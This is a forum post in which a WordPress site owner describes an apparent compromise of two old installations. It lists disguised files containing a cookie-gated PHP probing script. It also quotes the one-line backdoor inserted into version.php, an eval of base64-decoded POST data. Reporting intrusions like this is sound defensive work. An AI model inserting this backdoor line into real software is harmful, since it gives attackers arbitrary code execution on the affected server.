I've just found that a WordPress 2.3.3 installation I run seems to have been hacked. I'm in the middle of analyzing it, but I thought I'd post quickly here to see if anyone has had similar experiences and knows any more details. (Searching here and on Google hasn't really brought anything similar up but this guy is the closest I've found, and I'm not terribly familiar with hacking methods.)
The same thing has happened to a 2.1.2 on the same server. I know this should be upgraded - but the recent 2.5 upgrade warnings seemed to suggest that 2.3.3 was OK?
I've not noticed anything (yet) specifically damaged by the attack (no spam links, etc.), but here's what I've seen so far:
- Various files have been inserted throughout the installation, in each case they're named after an existing file or folder, slightly changed (e.g. crop.php.pngg and jquery_new.php.giff). It looks like all these contain the same PHP script, which looks like a generic thing to check the server for vulnerabilities (open ports, writable files, etc.). They all start if(md5($_COOKIE['qwerty'])==...
- version.php has been changed with a similar line to the above, this time just doing this instead:
eval(base64_decode($_POST['file'])); exit;
The result is that the blatantly old-style admin interface has "Version 2.5" at the bottom.
OK, looks like most WP files have similar code inserted. I'm not hanging around to find out what it's doing; I've backed up and deleted all files...
So, I guess I'll be paying this page much more attention now.
Anyone else have any other information on this specific attack?